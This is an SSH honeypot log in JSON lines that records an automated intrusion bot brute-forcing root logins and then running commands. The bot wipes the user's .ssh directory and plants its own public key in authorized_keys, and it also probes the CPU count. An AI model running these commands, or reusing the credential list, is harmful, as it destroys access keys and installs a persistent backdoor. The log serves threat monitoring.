{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:13:35.754590Z","src_ip":"212.227.235.229","session":"1edb50c0b843"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:13:37.115691Z","src_ip":"212.227.235.229","session":"1edb50c0b843"}
{"eventid":"cowrie.session.closed","duration":"9.5","message":"Connection lost after 9.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:13:37.447085Z","src_ip":"212.227.235.229","session":"78062bc50022"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:13:37.448168Z","src_ip":"212.227.235.229","session":"1edb50c0b843"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53120,"dst_ip":"1.2.3.4","dst_port":22,"session":"588eb7aef7cb","protocol":"ssh","message":"New connection: 212.227.235.229:53120 (1.2.3.4:22) [session: 588eb7aef7cb]","sensor":"my-vps","timestamp":"2025-09-08T22:13:37.972831Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:13:37.973739Z","src_ip":"212.227.235.229","session":"588eb7aef7cb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:13:38.265702Z","src_ip":"212.227.235.229","session":"588eb7aef7cb"}
{"eventid":"cowrie.login.success","username":"root","password":"123qwe,./","message":"login attempt [root/123qwe,./] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:13:39.475493Z","src_ip":"212.227.235.229","session":"588eb7aef7cb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:13:40.118429Z","src_ip":"212.227.235.229","session":"588eb7aef7cb"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:13:40.119145Z","src_ip":"212.227.235.229","session":"588eb7aef7cb"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:13:40.120068Z","src_ip":"212.227.235.229","session":"588eb7aef7cb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:13:40.413328Z","src_ip":"212.227.235.229","session":"588eb7aef7cb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:13:41.016755Z","src_ip":"212.227.235.229","session":"588eb7aef7cb"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:13:41.017455Z","src_ip":"212.227.235.229","session":"588eb7aef7cb"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:13:41.312012Z","src_ip":"212.227.235.229","session":"588eb7aef7cb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:13:41.313141Z","src_ip":"212.227.235.229","session":"588eb7aef7cb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53132,"dst_ip":"1.2.3.4","dst_port":22,"session":"63eecb7a5a58","protocol":"ssh","message":"New connection: 212.227.235.229:53132 (1.2.3.4:22) [session: 63eecb7a5a58]","sensor":"my-vps","timestamp":"2025-09-08T22:13:41.604244Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:13:41.604899Z","src_ip":"212.227.235.229","session":"63eecb7a5a58"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:13:41.895888Z","src_ip":"212.227.235.229","session":"63eecb7a5a58"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:13:43.102858Z","src_ip":"212.227.235.229","session":"63eecb7a5a58"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45940,"dst_ip":"1.2.3.4","dst_port":22,"session":"3175317b065a","protocol":"ssh","message":"New connection: 212.227.235.229:45940 (1.2.3.4:22) [session: 3175317b065a]","sensor":"my-vps","timestamp":"2025-09-08T22:13:44.363511Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:13:44.364296Z","src_ip":"212.227.235.229","session":"3175317b065a"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:13:44.396040Z","src_ip":"212.227.235.229","session":"63eecb7a5a58"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:13:44.616696Z","src_ip":"212.227.235.229","session":"3175317b065a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53140,"dst_ip":"1.2.3.4","dst_port":22,"session":"19c8f6ae672f","protocol":"ssh","message":"New connection: 212.227.235.229:53140 (1.2.3.4:22) [session: 19c8f6ae672f]","sensor":"my-vps","timestamp":"2025-09-08T22:13:44.686033Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:13:44.686860Z","src_ip":"212.227.235.229","session":"19c8f6ae672f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:13:44.978095Z","src_ip":"212.227.235.229","session":"19c8f6ae672f"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:13:46.181981Z","src_ip":"212.227.235.229","session":"19c8f6ae672f"}
{"eventid":"cowrie.login.success","username":"root","password":"sasman","message":"login attempt [root/sasman] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:13:46.332160Z","src_ip":"212.227.235.229","session":"3175317b065a"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:13:46.472682Z","src_ip":"212.227.235.229","session":"588eb7aef7cb"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:13:46.474019Z","src_ip":"212.227.235.229","session":"19c8f6ae672f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:13:47.428558Z","src_ip":"212.227.235.229","session":"3175317b065a"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:13:47.429216Z","src_ip":"212.227.235.229","session":"3175317b065a"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:13:47.430128Z","src_ip":"212.227.235.229","session":"3175317b065a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"1.4","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:13:48.779819Z","src_ip":"212.227.235.229","session":"3175317b065a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:13:49.054309Z","src_ip":"212.227.235.229","session":"3175317b065a"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:13:49.055008Z","src_ip":"212.227.235.229","session":"3175317b065a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:13:49.307892Z","src_ip":"212.227.235.229","session":"3175317b065a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:13:49.308801Z","src_ip":"212.227.235.229","session":"3175317b065a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45944,"dst_ip":"1.2.3.4","dst_port":22,"session":"3a9d7ee64641","protocol":"ssh","message":"New connection: 212.227.235.229:45944 (1.2.3.4:22) [session: 3a9d7ee64641]","sensor":"my-vps","timestamp":"2025-09-08T22:13:50.315127Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:13:50.316184Z","src_ip":"212.227.235.229","session":"3a9d7ee64641"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:13:52.043031Z","src_ip":"212.227.235.229","session":"3a9d7ee64641"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:13:52.799641Z","src_ip":"212.227.235.229","session":"3a9d7ee64641"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:13:54.053960Z","src_ip":"212.227.235.229","session":"3a9d7ee64641"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41606,"dst_ip":"1.2.3.4","dst_port":22,"session":"f1dc66b870b0","protocol":"ssh","message":"New connection: 212.227.235.229:41606 (1.2.3.4:22) [session: f1dc66b870b0]","sensor":"my-vps","timestamp":"2025-09-08T22:13:57.326446Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58274,"dst_ip":"1.2.3.4","dst_port":22,"session":"6fba3dac9989","protocol":"ssh","message":"New connection: 212.227.235.229:58274 (1.2.3.4:22) [session: 6fba3dac9989]","sensor":"my-vps","timestamp":"2025-09-08T22:13:59.618653Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:13:59.619542Z","src_ip":"212.227.235.229","session":"6fba3dac9989"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:13:59.936523Z","src_ip":"212.227.235.229","session":"6fba3dac9989"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:14:00.850699Z","src_ip":"212.227.235.229","session":"3175317b065a"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep name | wc -l","sensor":"my-vps","timestamp":"2025-09-08T22:14:00.851438Z","src_ip":"212.227.235.229","session":"3175317b065a"}
{"eventid":"cowrie.login.failed","username":"db1inst1","password":"123","message":"login attempt [db1inst1/123] failed","sensor":"my-vps","timestamp":"2025-09-08T22:14:01.245167Z","src_ip":"212.227.235.229","session":"6fba3dac9989"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36524,"dst_ip":"1.2.3.4","dst_port":22,"session":"91105a924d52","protocol":"ssh","message":"New connection: 212.227.125.160:36524 (1.2.3.4:22) [session: 91105a924d52]","sensor":"my-vps","timestamp":"2025-09-08T22:14:01.997689Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-PUTTY","message":"Remote SSH version: SSH-2.0-PUTTY","sensor":"my-vps","timestamp":"2025-09-08T22:14:01.998677Z","src_ip":"212.227.125.160","session":"91105a924d52"}
